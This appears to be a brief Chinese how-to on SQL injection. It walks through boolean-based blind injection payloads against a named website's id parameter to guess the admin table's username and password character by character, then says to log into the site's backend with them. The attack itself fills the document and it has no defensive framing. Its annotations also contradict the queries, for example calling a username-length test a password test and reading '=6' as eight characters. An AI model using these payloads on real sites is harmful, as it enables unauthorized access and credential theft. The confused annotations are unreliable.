sql 注入方式

1.寻找目标
目标网站：http://www.chencheng.com/index.php?id=407
2.测试目标
http://www.chencheng.com/index.php?id=407 and 1=1         返回正常
http://www.chencheng.com/index.php?id=407 and 1=2         返回异常
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin)and 1=(select min(id) from admin)     返回正常 说明存在
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where len(username)>4)     返回正常，确定密码大于4位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where len(username)<8)   返回正常，确定密码小于8位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where len(username)=6)  返回正常，确定密码等于8位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where left(username,1)='1') 返回正常，确定管理员编号为第一位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where left(password,1)='3') 返回正常，猜测密码
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where left(password,6)='335500') 返回正常，猜测密码
根据猜测帐号，密码，然后选择登陆窗口登陆后台！呵呵